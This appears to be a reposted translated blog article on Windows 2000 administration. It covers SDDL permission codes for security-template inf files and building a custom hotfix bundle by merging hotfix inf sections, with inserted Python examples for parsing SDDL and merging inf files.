"LC" LIST CHILDREN
"SW" SELF WRITE
"LO" LIST OBJECT
"DT" DELETE TREE
"CR" CONTROL ACCESS
For files:
"FA" ALL
"FR" READ
"FW" WRITE
"FX" EXECUTE
For registry keys:
"KA" ALL
"KR" READ
"KW" WRITE
"KX" EXECUTE
Note: like files and directories, registry permissions can also be set in the inf file, in the same format; just replace the file name with the key name, e.g. machine\software\NSFOCUS\Adam

Fields 4 and 5 are both empty; they hold the object GUID and the inherit object GUID respectively. In most inf files I have seen these two fields are empty, so leave them empty when writing your own :)

Field 6: the user or group. Usually what we set here is a built-in user or group; if you insist on setting this for a user you created yourself, use the user's or group's SID. Built-in users and groups are written as follows:
"AO" Account operators
"RU" Alias to allow previous Windows 2000
"AN" Anonymous logon
"AU" Authenticated users
"BA" Built-in administrators
"BG" Built-in guests
"BO" Backup operators
"BU" Built-in users
"CA" Certificate server administrators
"CG" Creator group
"CO" Creator owner
"DA" Domain administrators
"DC" Domain computers
"DD" Domain controllers
"DG" Domain guests
"DU" Domain users
"EA" Enterprise administrators
"ED" Enterprise domain controllers
"WD" Everyone
"PA" Group Policy administrators
"IU" Interactively logged-on user
"LA" Local administrator
"LG" Local guest
"LS" Local service account
"SY" Local system
"NU" Network logon user
"NO" Network configuration operators
"NS" Network service account
"PO" Printer operators
"PS" Personal self
"PU" Power users
"RS" RAS servers group
"RD" Terminal server users
"RE" Replicator
"RC" Restricted code
"SA" Schema administrators
"SO" Server operators
"SU" Service logon user
In this list we can easily find that the BG we used stands for the Guests group.

If we set several ACEs on one file or folder object, say
Local Administrators: Full Control
Local Guests: Read

then we can write "D:AR(A;OICI;FA;;;LA)(A;OICI;FR;;;BG)"

OK, that is about all for this rough introduction to SDDL. Reading alone is of limited use; you need to test these things yourself. Corrections from readers are welcome...

References:
MSDN Library
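The two SDDL strings discussed above, and the System (F) / adam (F) directory permissions from the NNTP article earlier on this page, worked through in code. This is an added example, not the article's own code or anything from Microsoft: the lookup tables are just the subsets of the codes listed in the text that the script needs, the SID for the custom adam group is a constructed placeholder (a custom group has no two-letter alias, so a real template would carry its real SID), the C: drive letter is assumed, and the deny-before-allow check in build_dacl enforces the canonical DACL order that Windows expects, which the article does not mention.

```python
"""Parse and build the SDDL strings used in the File Security section of a
security-template inf file.  Added example, not the article's own code; the
lookup tables are the subsets of the codes listed in the text that it needs."""
import re
from typing import List, NamedTuple

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "AUDIT", "AL": "ALARM"}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "AUDIT_SUCCESS", "FA": "AUDIT_FAILURE"}
RIGHTS = {"FA": "FILE_ALL", "FR": "FILE_READ", "FW": "FILE_WRITE", "FX": "FILE_EXECUTE",
          "KA": "KEY_ALL", "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE"}
TRUSTEES = {"BA": "Built-in administrators", "BG": "Built-in guests", "BU": "Built-in users",
            "LA": "Local administrator", "SY": "Local system", "WD": "Everyone"}


class Ace(NamedTuple):
    ace_type: str       # field 1: A, D, AU, AL
    flags: List[str]    # field 2: OI, CI, NP, IO, ID, ...
    rights: List[str]   # field 3: FA, FR, KA, ... (or one raw 0x... access mask)
    object_guid: str    # field 4: normally empty
    inherit_guid: str   # field 5: normally empty
    trustee: str        # field 6: two-letter alias or an S-1-... SID


def _split_codes(text: str, table: dict) -> List[str]:
    """Split a run of two-letter codes such as 'OICI' into ['OI', 'CI']."""
    if text.startswith("0x"):
        return [text]                       # rights may also be a hex access mask
    codes = [text[i:i + 2] for i in range(0, len(text), 2)]
    if len(text) % 2 or any(c not in table for c in codes):
        raise ValueError(f"bad SDDL code string {text!r}")
    return codes


def parse_ace(body: str) -> Ace:
    """Parse the inside of one '(...)' group: type;flags;rights;guid;guid;trustee."""
    fields = body.split(";")
    if len(fields) != 6 or fields[0] not in ACE_TYPES:
        raise ValueError(f"malformed ACE {body!r}")
    ace_type, flags, rights, oguid, iguid, trustee = fields
    if not (trustee in TRUSTEES or trustee.startswith("S-1-")):
        raise ValueError(f"trustee must be a known alias or a SID: {trustee!r}")
    return Ace(ace_type, _split_codes(flags, ACE_FLAGS),
               _split_codes(rights, RIGHTS), oguid, iguid, trustee)


def parse_sddl(sddl: str) -> dict:
    """Return {'O': trustee, 'G': trustee, 'D': {flags, aces}, 'S': {...}} for the parts present."""
    parts = re.split(r"([OGDS]):", sddl)    # ['', key, value, key, value, ...]
    if parts[0] != "" or len(parts) < 3:
        raise ValueError(f"SDDL must start with O:, G:, D: or S:, got {sddl!r}")
    result = {}
    for key, value in zip(parts[1::2], parts[2::2]):
        if key in ("O", "G"):
            result[key] = value             # owner / primary group are just a trustee
            continue
        head, sep, rest = value.partition("(")
        control = re.findall(r"AR|AI|P", head)   # ACL control flags before the first ACE
        if "".join(control) != head or not re.fullmatch(r"(?:\([^()]*\))*", sep + rest):
            raise ValueError(f"malformed {key}: list {value!r}")
        aces = [parse_ace(b) for b in re.findall(r"\(([^()]*)\)", sep + rest)]
        result[key] = {"flags": control, "aces": aces}
    return result


def describe_ace(ace: Ace) -> str:
    """Readable form, e.g. 'ACCESS_DENIED FILE_ALL -> Built-in guests [OBJECT_INHERIT,...]'."""
    who = TRUSTEES.get(ace.trustee, f"SID {ace.trustee}")
    rights = ",".join(RIGHTS.get(r, r) for r in ace.rights)
    flags = ",".join(ACE_FLAGS[f] for f in ace.flags)
    return f"{ACE_TYPES[ace.ace_type]} {rights} -> {who}" + (f" [{flags}]" if flags else "")


def build_dacl(control: List[str], aces: List[Ace]) -> str:
    """Inverse of parse_sddl for the D: part; explicit deny ACEs must come first."""
    if [a.ace_type for a in aces] != sorted((a.ace_type for a in aces), key=lambda t: t != "D"):
        raise ValueError("deny ACEs must precede allow ACEs (canonical DACL order)")
    body = "".join("(" + ";".join([a.ace_type, "".join(a.flags), "".join(a.rights),
                                   a.object_guid, a.inherit_guid, a.trustee]) + ")" for a in aces)
    return "D:" + "".join(control) + body


def file_security_line(path: str, mode: int, sddl: str) -> str:
    """One line of the inf File Security section: "path",mode,"sddl" (mode 0, 1 or 2)."""
    if mode not in (0, 1, 2):
        raise ValueError("mode must be 0, 1 or 2")
    parse_sddl(sddl)        # reject a malformed descriptor before it reaches the template
    return f'"{path}",{mode},"{sddl}"'


# Constructed placeholder SID for the custom 'adam' group of the NNTP article; a custom
# group has no two-letter alias, so a real template must carry the group's real SID.
ADAM_GROUP_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"


def nntp_group_line() -> str:
    """System (F) and adam (F) on the newsgroup directory, everyone else locked out."""
    aces = [Ace("A", ["OI", "CI"], ["FA"], "", "", "SY"),
            Ace("A", ["OI", "CI"], ["FA"], "", "", ADAM_GROUP_SID)]
    # P drops inherited ACEs so the parent's permissions cannot widen access; mode 2
    # pushes the result down onto the existing message files.  Drive letter C: assumed.
    return file_security_line(r"C:\Inetpub\nntpfile\root\adam\test", 2, build_dacl(["P"], aces))
```

Running parse_sddl over the cmd.exe line and printing describe_ace for each ACE is the quickest way to review a template you did not write yourself. For the newsgroup directory the P control flag was chosen instead of the article's AR because the goal there is that nothing inherited from \Inetpub\nntpfile\root can reopen access to the group; with AR the parent's inheritable ACEs would still apply.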

How to build your own Service Pack
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:46

As a Windows system administrator you are no stranger to installing security hotfixes. Every time we finish building a machine we download countless patches, and the annoying part is that almost every hotfix makes the system reboot. Of course, we can decline to click "OK" at the reboot prompt, install the remaining patches and reboot only once at the end, but that looks a little unprofessional. Today I will show you how to build your own Service Pack, which installs all the patches you need in one go. Pretty cool, huh?

For the test I chose a Chinese edition of Windows 2000 Server. We need to install two security patches (there are of course more than these; this is just an illustration): the patch for the Windows 2000 input method (IME) vulnerability (Q270676) and the named-pipe patch (Q269523).

Now, Let's go~

1. First download the hotfixes we need: http://download.microsoft.com/download/win2000platform/Patch/Q269523/NT5/CN/Q269523_W2K_SP2_x86_CN.EXE and http://download.microsoft.com/download/win2000platform/Patch/q270676/NT5/CN/Q270676_W2K_SP2_x86_CN.EXE.

2. Switch to a command prompt, create a hotfix directory on drive C, then run

Q269523_W2K_SP2_x86_CN.EXE /x (I suggest unpacking in order of Q number, smallest first; the reason is given later.)
When prompted for the extraction path, enter "C:\Hotfix".
C:\>cd hotfix

C:\hotfix>dir
驅動器 C 中的卷是 C
卷的序列號是 AC58-F7F5

C:\hotfix 的目錄

2001-05-04  04:00       <DIR>          .
2001-05-04  04:00       <DIR>          ..
2000-08-14  18:57               98,064 hotfix.exe
2000-08-14  18:57               15,139 hotfix.inf
2000-08-14  17:19              835,856 kernel32.dll
2000-08-14  17:19               85,776 services.exe
2000-08-14  18:31               88,245 sp2.cat
2000-08-14  18:57                3,584 spmsg.dll
2001-05-04  04:00       <DIR>          symbols
2001-05-04  04:00       <DIR>          uniproc

Then make a copy of the hotfix.inf file.
C:\hotfix>copy hotfix.inf q269523_cn.inf
已複製         1 個文件。

Next, unpack the second hotfix:
Q270676_W2K_SP2_x86_CN.EXE /x
When prompted for the extraction path, enter "C:\Hotfix".
Again make a copy of the hotfix.inf file as it is at this point.
C:\hotfix>copy hotfix.inf q270676_cn.inf
已複製         1 個文件。

Repeat the same steps for the third, fourth, ... hotfix.

3. By now all the hotfix files have been unpacked into C:\Hotfix, and we have a copy of each hotfix's inf file. Let's analyse these inf files. We usually use the last unpacked inf file as the template: an inf file has many sections and, from what I have observed, sections tend to be added over time, which is why we unpacked in Q-number order. In this example the Q270676 inf file is the template. We edit hotfix.inf, which already contains the Q270676 information, and only need to add the Q269523 information to it. Here is what the Q269523 inf file contains:

Most of the early part is essentially the same; we only look for the sections that differ.

[MustReplace.System32.files]
SERVICES.EXE
[CopyAlways.DriverCab.files]
kernel32.dll
[Cache.files]
SERVICES.EXE
KERNEL32.DLL
[Uniprocessor.Kernel.files]
KERNEL32.DLL,UNIPROC\KERNEL32.DLL
[Multiprocessor.Kernel.files]
KERNEL32.DLL
[SourceDisksFiles]
SERVICES.EXE=1
UNIPROC\KERNEL32.DLL
KERNEL32.DLL=1

Then search hotfix.inf for MustReplace.System32.files and add the line
SERVICES.EXE
For convenience later on we usually add a comment; after editing, the MustReplace.System32.files section of hotfix.inf looks like this:

[MustReplace.System32.files]

;Q269523  Added by Adam
    SERVICES.EXE

Next search for CopyAlways.DriverCab.files, Cache.files, Uniprocessor.Kernel.files, Multiprocessor.Kernel.files and SourceDisksFiles and add the corresponding entries to hotfix.inf, remembering to add the necessary comments; the comment character in an inf file is the semicolon. We also suggest commenting the relevant entries that the template already has. For example, Cache.files, which both hotfixes contain, becomes after editing:

[Cache.files]

;Q269523  Added by Adam
    SERVICES.EXE
    KERNEL32.DLL

;Q270676  Added by Adam
    winzm.ime
    winsp.ime
    winpy.ime
    wingb.ime
    winabc.ime

At this point we could already use what we have built, but for later convenience we should change some of the displayed information, namely the Strings section of the inf file. The Strings section is at the very end of the inf file, and some necessary information must be changed there.

First change the Q number (not your OICQ number) to any six-digit number you like. Other characters would also work, but might conflict with some hotfix-checking tools, so stick to six digits. Then change the Comment: paste in the Comment from Q269523, optionally adding a description of your own. The edited Strings section then looks like this:

[Strings]

    LangTypeValue=4
    ServicePackSourceFiles="Windows 2000 Hotfix 源文件"
    HOTFIX_NUMBER="Q123456"
    SERVICE_PACK_NUMBER=1
    COMMENT="Windows 2000 Hotfix (Pre-SP2) [See Q270676 for more information] This Fix Corrects the IME Problem...Windows 2000 Hotfix (Pre-SP2) [See Q269523 for more information] This Fix Corrects the NamePipe Problem..."

This also makes it easier to review the installed patches later.
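The merging done by hand in step 3 and in the Strings edit above, as an added example (not the article's code, and nothing to do with how HotFix.exe itself processes the file): it takes the inf text of the template and of each extra hotfix, appends the extra hotfixes' entries to every file-list section under a ";Qnnnnnn  Added by ..." comment, and rewrites HOTFIX_NUMBER and COMMENT in [Strings]. The two inf texts are constructed, cut-down stand-ins for the real hotfix.inf copies, and the rule that the template's entry wins when two hotfixes list the same file is my choice, not the article's.

```python
"""Merge the file-list sections of several unpacked hotfix inf files into one
template, the way the article does by hand.  Added example, not the article's
code or Microsoft's; it works on inf text in memory and writes nothing to disk."""
from typing import Dict, List

# Constructed, cut-down inf texts standing in for the two real hotfix.inf copies.
TEMPLATE_INF = """
[MustReplace.System32.files]
[Cache.files]
winzm.ime
winpy.ime
[Strings]
HOTFIX_NUMBER="Q270676"
COMMENT="Windows 2000 Hotfix (Pre-SP2) [See Q270676 for more information]"
"""
EXTRA_INF = """
[MustReplace.System32.files]
SERVICES.EXE
[Cache.files]
SERVICES.EXE
KERNEL32.DLL
[Strings]
HOTFIX_NUMBER="Q269523"
COMMENT="Windows 2000 Hotfix (Pre-SP2) [See Q269523 for more information]"
"""

def parse_inf(text: str) -> Dict[str, List[str]]:
    """Split inf text into {section: [entries]}; ';' comments and blank lines are dropped."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is None:
            raise ValueError(f"entry before any section header: {line!r}")
        else:
            sections[current].append(line)
    return sections

def is_file_section(name: str) -> bool:
    """The sections the article merges: the *.files lists and SourceDisksFiles."""
    return name.endswith(".files") or name == "SourceDisksFiles"

def strings_value(inf: Dict[str, List[str]], key: str) -> str:
    """Value of key=... in [Strings], with surrounding quotes removed ('' if absent)."""
    for entry in inf.get("Strings", []):
        k, _, v = entry.partition("=")
        if k.strip() == key:
            return v.strip().strip('"')
    return ""

def merge_hotfixes(template_q: str, template: str, extras: Dict[str, str],
                   new_q: str, tag: str = "Added by merge") -> str:
    """Return the merged inf text.  Every file-list section carries the template's
    entries plus those of each extra hotfix, each group labelled with its Q number;
    [Strings] gets new_q as HOTFIX_NUMBER and every COMMENT joined into one."""
    base = parse_inf(template)
    others = {q: parse_inf(text) for q, text in extras.items()}
    names = list(base)
    for inf in others.values():                  # file sections only an extra hotfix has
        names += [n for n in inf if is_file_section(n) and n not in names]
    out: List[str] = []
    for name in names:
        out.append(f"[{name}]")
        if name == "Strings":
            comments = [strings_value(base, "COMMENT")]
            comments += [strings_value(o, "COMMENT") for o in others.values()]
            for entry in base[name]:
                key = entry.partition("=")[0].strip()
                if key == "HOTFIX_NUMBER":
                    entry = f'HOTFIX_NUMBER="{new_q}"'
                elif key == "COMMENT":
                    entry = 'COMMENT="' + " ".join(c for c in comments if c) + '"'
                out.append("    " + entry)
        elif is_file_section(name):
            # The template (highest Q number, unpacked last) wins on duplicate file names,
            # matching which copy of the file is actually left in the unpack directory.
            seen = set()
            for q, inf in [(template_q, base)] + list(others.items()):
                fresh = [e for e in inf.get(name, []) if e.lower() not in seen]
                seen.update(e.lower() for e in fresh)
                if fresh:
                    out.append(f";{q}  {tag}")
                    out.extend("    " + e for e in fresh)
        else:
            out.extend(base[name])
        out.append("")
    return "\n".join(out)
```

Call merge_hotfixes("Q270676", TEMPLATE_INF, {"Q269523": EXTRA_INF}, "Q123456") to get the merged text; feeding the result back through parse_inf is a cheap way to confirm that every entry from both hotfixes survived and that [Strings] carries the new Q number before you copy the file over hotfix.inf.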

4. Good, the editing is done; let's install our home-made Service Pack. All we need to do is run HotFix.exe, which finds the inf file by itself. You will see a file-copy progress bar, then the system asks you to reboot. Click "OK", reboot, and our hotfix is installed.

5. Finally, let's check the result. Look in the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix

You will find your installed Q123456 sitting obediently there. Quite a sense of achievement!

To sum up: whenever a new hotfix comes out, add its files to your SP package and update your inf file, and you no longer need to care whether Microsoft releases another SP for you (there will be no SP7 for NT 4). Of course, a real SP contains more than security patches and improves other aspects of the system as well; a home-made version is no match for the real thing.

posted on 2008-05-27 16:56 by freeliver54

Comments
#1 2008-05-27 20:46 烏生魚湯
Admiration like a mighty river.